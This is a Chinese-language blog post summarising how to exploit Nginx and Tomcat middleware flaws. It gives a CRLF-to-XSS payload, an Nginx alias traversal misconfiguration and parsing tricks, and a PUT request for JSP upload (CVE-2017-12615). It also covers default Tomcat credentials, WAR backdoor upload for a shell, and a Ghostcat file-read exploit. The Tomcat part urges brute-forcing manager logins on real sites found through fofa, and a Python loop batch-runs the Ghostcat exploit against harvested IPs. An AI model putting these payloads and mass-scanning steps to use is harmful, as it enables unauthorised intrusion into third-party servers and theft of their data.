中间件漏洞总结-Nginx-Tomcat

最新推荐文章于 2024-07-30 16:13:32 发布
最新推荐文章于 2024-07-30 16:13:32 发布
阅读量3.3k 收藏 6
点赞数 1
分类专栏: 中间件安全 文章标签: nginx 中间件 tomcat
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53577336/article/details/123020050
版权

0x00 中间件漏洞-Nginx

1.CRLF漏洞
crlf就是换行回车的意思,当在数据包中加入换行回车的url编码,会被解析导致当前数据换行回车而出现在下一列,可以配合触发xss等漏洞

payload触发xss:/%0D%0A%0D%0A%3Cimg%20src=1%20οnerrοr=alert(/xss/)%3E

这里附上一个CRLF的检测工具:https://github.com/dwisiswant0/crlfuzz

2.路径穿越,配置错误
Nginx在配置别名(Alias)的时候,如果忘记加/,将造成一个目录穿越漏洞。
错误的配置文件示例(原本的目的是为了让用户访问到/home/目录下的文件):

location /files {
    alias /home/;
}


3.错误配置解析漏洞 CVE-2013-4547
解析错误:/1.gif[0x20][0x00].php
上传修改hex 20 20 为 20 00:

4.错误解析漏洞
/1.png未解析 但是/1.png/.php被解析

添加.php被解析:

0x01 中间件漏洞-Tomcat

1.put请求 任意文件写入 CVE-2017-12615

PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

shell


2.Tomcat 弱口令 (弱口令爆破)
路径:8080/manager/html
弱口令:tomcat:tomcat

弱口令爆破:外真实网站

fofa:"manager/html"

观察数据包的账户与密码传参解码

密码的加密方式:

使用Bp爆破:配置三个密码账户参数格式,使用加密编码传输爆破

爆破:

3.Tomcat war包上传getshell
登录后位置有个文件上传位置,上传jsp的war后门包,访问jps文件尝试getshell
”tomcat war包上传getshell“

4.文件读取漏洞 CVE-2020-1938
POC脚本:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
读取成功:读取WEB-INF/web.xml文件

读取ROOT目录下的build.xml文件内容

fofa批量验证扫描:1.txt为tomcat的8009开发的IP资产

import os
for ip in open("1.txt"):
    ip=ip.replace('\n','')
    cmd="python  CNVD-2020-10487-Tomcat-Ajp-lfi.py -p 8009 -f build.xml "+ip
    os.system(cmd)  #注意python开启的版本

此漏洞后期的shell需要配合上传,配合包含漏洞

告白热
关注
专栏目录
中间件漏洞详解
10-26
本课程分别从iis5.x/6、iis7、apache三个中间件漏洞进行分析,首先从原理上介绍形成该漏洞的原因,而后通过实战的形式演示怎么利用这三种漏洞对服务器进行攻击。
Nginx结合tomcat反向代理和多个项目的路径转发
二祥的工作历程
12-21 2072
正向代理 直接访问不到,通过一个中转,来访问。 反向代理 暴露的代理服务器,隐藏的真实的服务器。客户端把请求发给反向代理服务器,反向代理服务器进行转发。 负载均衡 将请求分发到不同的服务器上。 动静分离 案例 nginx代理访问到tomcat 启动tomcat,地址为http://192.168.2.103:8080。 修改redis的配置文件,将访问redis的路径转发到tomcat上。 server { listen 80; # 对localhost:80监听,对地址
nginx常见漏洞解析
热门推荐
qtttgeq的博客
04-06 1万+
0×1HTTP返回包头:就是httpresponsHTTP返回包体:就是请求的具体文件,例如出来个网页资源,网页内嵌套的内容等等。content-range是什么?range是什么?存在于HTTP请求头中,表示请求目标资源的部分内容,例如请求一个图片的前半部分,单位是byte,原则上从0开始,但今天介绍的是可以设置为负数。range的典型应用场景例如:断点续传、分批请求资源。content-range的表达方式:Range:bytes=0-1024 表示访问第0到第1024字节;
中间件安全:Nginx 解析漏洞测试.
最新发布
网络安全领域___专研者.
07-30 864
Nginx 是一个高性能的 HTTP和反向 代理服务器,Nginx 解析漏洞是一个由于配置不当导致的安全问题,它不依赖于Nginx或PHP的特定版本,而是由于用户配置错误造成的。这个漏洞允许攻击者上传看似无害的文件,例如图片格式的文件,但实际上这些文件中包含了PHP代码。当这些文件被请求时,由于配置错误,Nginx会将这些文件作为PHP文件执行,从而可能允许攻击者执行任意代码。
常见中间件漏洞总结
qq_40898302的博客
06-07 9166
常见中间件漏洞总结
通过nginx配置防御web漏洞
JAVA领域优质创作者,基于分片网络查询方法专利发明者。
12-28 1975
# 相关安全漏洞响应头 # 检测到目标 X-Content-Type-Options响应头缺失 这个暂时不开启,不然部分banner无法使用 add_header X-Content-Type-Options nosniff; # 检测到目标 X-XSS-Protection响应头缺失 add_header X-XSS-Protection "1; mode=block"; # 检测到目标 Content-Security-Policy响应头缺失 add_head
常见中间件漏洞总结PPT
01-25
中间件领域,常见的产品包括WebLogic、TomcatNginx、IIS(Internet Information Services)、JBoss等。 1. WebLogic是Oracle公司的一个Java EE应用服务器,它支持企业级应用的部署和运行。WebLogic的漏洞往往...
apache-tomcat-8.5.84
01-17
管理员可以通过修改conf/server.xml和conf/tomcat-users.xml文件来配置用户访问控制、SSL/TLS连接以及防火墙规则等安全设置。 在性能优化方面,Tomcat提供了多种策略,如调整连接器参数(例如最大线程数、超时时间...
nginx-1.19.2.zip
08-18
3. **中间件**:在软件架构中,Nginx作为中间件,起到了连接前端与后端应用的桥梁作用,通过配置实现多种功能,如URL重写、访问控制、GZIP压缩等。 **二、Nginx 1.19.2版本特性** Nginx 1.19.2是2020年发布的一个...
基线扫描漏洞整改参考文档_jchaoy
07-28
本文档主要介绍了nginx、websphere和tomcat三类中间件的基线扫描漏洞整改方法,对于中间件管理员和安全管理员提供了实用的参考指南。 一、Nginx基线扫描漏洞整改方法 1.隐藏Nginx版本信息 为了防止攻击者通过...
常用中间件安装部署手册
03-05
《常用中间件安装部署手册》V2.0 版本提供了详尽的步骤与指导,旨在帮助运维人员高效地在服务器上安装和配置各种中间件,以满足不同业务需求。以下将逐一阐述其中涉及的关键知识点。 1. **注意事项**: 在开始安装...
linux centos nginx tomcat配置文件路径,CentOS 6.7下Nginx+Tomcat简单配置及整合
weixin_39760619的博客
04-29 190
系统环境:CentOS 6.7软件环境:JDK-1.8.0_65、Nginx-1.10.3、Tomcat-8.5.8文档环境:/opt/app/ 存放软件目录,至于mkdir创建文件就不用再说了首先将东西下载或上传到服务器上,/opt/app/目录存放Tomcat和JDK的包,分别是apache-tomcat-8.5.8.tar.gz和jdk-8u65-linux-x64.tar.gz,使用tar...
中间件漏洞详解(iss、apache、nginxtomcat、weblogic、jboss)
m0_50818626的博客
07-13 2109
(1)(2)(3)(1)(2)(1)(2)(1)(2)(3)(1)(2)(1)(2)(3)
Tomcat漏洞详解
m0_64481831的博客
03-06 2871
Tomcat是一种轻量级的web服务器,主要负责运行jsp和Servlet具有任意文件写入漏洞:主要影响7.0-7.8左右,原因是因为配置不当问题(conf/web.xml文件的readonly参数定义为false),导致可以使用PUT方法进行任意文件上传。jsp绕过方法有斜杠绕过、空格绕过和::$DATA绕过(后两者都需要在Windows下)具有文件包含漏洞:主要影响6和8版本,7和9版本有少数;原因是因为AJP协议存在缺陷而导致攻击者可以构造任意参数来进行任意文件包含和读取文件。
tomcat漏洞修复
m0_61069946的博客
03-19 5776
X-Content-Type-Options HTTP 消息头相当于一个提示标志,被服务器用来提示客户端一定要遵循在 Content-Type 首部中对 MIME 类型 的设定,而不能对其进行修改。Web 服务器对于 HTTP 请求的响应头中缺少 X-Download-Options,这将导致浏览器提供的安全特性失效。漏洞危害: Web 服务器对于 HTTP 请求的响应头中缺少 X-Download-Options,这将导致浏览器提供的安全特性失效,更容易遭受 Web 前端黑客攻击的影响。
outputstream 写入文件_浅谈URI中的任意文件下载
weixin_39816141的博客
11-25 382
原文来自SecIN社区—作者:tkswifty引言 文件下载是比较常见的业务。常见的接口格式为/download?fileName=xxx.png,整个过程若没过滤目录穿越符号…/或者未对下载的路径进行处理限制。当传入的filename参数为../../etc/passwd即可穿越路径达到任意文件下载的效果。 有些接口在尝试获取某一文件时,路径是/file/test.jpg,通过解析URI中的...
Nginx常见的中间件漏洞
qq_68163788的博客
11-25 2032
Nginx在收到/test.jpg/test.php路径时,首先判断文件类型,发现后缀是.php,便交给php处理,但php想要解析该文件时,发现并不存在,便删除掉/test.php,去找test.jpg,此时test.jpg是存在的,便要尝试解析它,但无奈后缀是.jpg,不是php,便报错Access denied。例如网站的首页的缓存,nginx的默认缓存路径在/tmp/nginx下,例如:当请求服务器的资源时,如果在缓存服务器中存在,则直接返回,不在访问应用服务器,可以降低应用服务器的负载。
安全中级2:nginx中间件漏洞
weixin_62870380的博客
05-22 2611
nginx中间件漏洞,CRLF(换行符漏洞)、目录穿越漏洞、add_heard漏洞nginx文件名逻辑漏洞nginx解析漏洞
【网络安全---漏洞复现】Tomcat CVE-2024-1938 漏洞复现和利用过程(特详细)
2401_84264010的博客
05-08 1404
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
Tomcat-Nginx-Redis session共享详解及实战图解
总结来说,本文详细介绍了如何通过TomcatNginx和Redis搭建一个分布式应用的session共享架构,这对于处理高并发场景和提升系统性能具有实际意义。不过,读者在迁移或应用这些技术时,需要根据自身的项目需求和技术...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

告白热

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值